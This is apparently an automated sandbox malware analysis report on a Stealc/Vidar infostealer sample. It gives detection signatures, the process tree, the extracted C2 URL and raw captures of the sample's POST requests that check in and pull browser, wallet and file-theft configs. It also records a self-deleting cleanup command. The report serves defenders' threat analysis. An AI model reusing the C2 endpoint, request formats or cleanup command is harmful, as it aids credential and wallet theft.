Edit tour

Windows Analysis Report
w7kdnBzGat.exe

Overview

General Information

Sample name:	w7kdnBzGat.exe renamed because original name is a hash value
Original sample name:	b4ffec30abb0de7d297eb9b20b7c02e3.exe
Analysis ID:	1448026
MD5:	b4ffec30abb0de7d297eb9b20b7c02e3
SHA1:	d76f4e95865dbf8291ba2a073b56941cd0f0f822
SHA256:	3d0b4757cc7790b45bcf440913e3e82bdf5107dc103fd2f392461dc59ee0a6db
Tags:	exe
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal ftp login credentials

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

w7kdnBzGat.exe (PID: 4288 cmdline: "C:\Users\user\Desktop\w7kdnBzGat.exe" MD5: B4FFEC30ABB0DE7D297EB9B20B7C02E3)

RegAsm.exe (PID: 408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 6164 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6592 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 4796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 268 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"}

Threatname: Vidar

{"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2034339347.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2034339347.0000000000440000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: RegAsm.exe PID: 408	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.w7kdnBzGat.exe.534b00.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.w7kdnBzGat.exe.534b00.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.w7kdnBzGat.exe.534b00.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.w7kdnBzGat.exe.534b00.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.w7kdnBzGat.exe.4a0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.w7kdnBzGat.exe.4a0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
Click to see the 5 entries

Snort Signatures

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 23.88.106.134

Timestamp:	05/27/24-14:53:00.307637
SID:	2044243
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 23.88.106.134

Timestamp:	05/27/24-14:53:00.964543
SID:	2044244
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 23.88.106.134

Timestamp:	05/27/24-14:53:01.204223
SID:	2044246
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://23.88.106.134/c73eed764cc59dcb.php.0//EN	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/84bad7132df89fd7/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://23.88.106.134	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/c73eed764cc59dcb.php	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/c73eed764cc59dcb.phpxKr	Avira URL Cloud: Label: malware
Source: http://23.88.106.134/c73eed764cc59dcb.phpininit.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000001.00000002.2034961312.000000000106A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"}
Source: 1.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://23.88.106.134/c73eed764cc59dcb.php"}

Multi AV Scanner detection for domain / URL

Source: http://23.88.106.134

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Source: w7kdnBzGat.exe	ReversingLabs: Detection: 63%
Source: w7kdnBzGat.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: w7kdnBzGat.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: /#%33@@@
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: @@@@<@@@
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/\|
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: %s\%V/yVs
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: %s\*.
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: }567y9n/S
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: ntTekeny
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: ging
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: PassMord0
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: J@@@`z`@J@@@J@@@
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: OPQRSTUVWXY
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: 456753+/---- '
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: '--- '
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: HHxf0UR{bYAy
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: 5336
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: login:
Source: 1.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: islr7$B

Source: w7kdnBzGat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: w7kdnBzGat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\p2facz8e\output.pdb& source: w7kdnBzGat.exe
Source:	Binary string: C:\p2facz8e\output.pdb source: w7kdnBzGat.exe

Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050E877 FindFirstFileExW,		0_2_0050E877
Source: C:\Users\user\Desktop\w7kdnBzGat.exe	Code function: 0_2_0050EC61 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_0050EC61

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 23.88.106.134:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 23.88.106.134:80
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 23.88.106.134:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://23.88.106.134/c73eed764cc59dcb.php
Source: Malware configuration extractor	URLs: http://23.88.106.134/c73eed764cc59dcb.php

Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 23.88.106.134Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 45 35 43 37 30 39 44 33 31 32 32 30 34 30 34 30 39 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 67 6f 79 64 61 31 34 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"5BE5C709D3122040409402------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"goyda1488------HDGCFHIDAKECFHIEBFCG--
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDGHost: 23.88.106.134Content-Length: 472Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 2d 2d 0d 0a Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="message"browsers------BFBGDGIDBAAEBFHJKJDG--
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="message"plugins------DAECGCGHCGHCAKECBKJK--
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 23.88.106.134Content-Length: 7275Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /84bad7132df89fd7/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 23.88.106.134Content-Length: 471Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"wallets------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 23.88.106.134Content-Length: 469Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 159.69.194.182 Port 80</address></body></html>------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"files------AFHIEBKKFHIEGCAKECGH--
Source: global traffic	HTTP traffic detected: POST /c73eed764cc59dcb.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFHost: 23.88.106.134Content-Length: 464Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 35 39 2e 36 39 2e 31 39 34 2e 31 38 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 2d 2d 0d 0a Data Ascii: 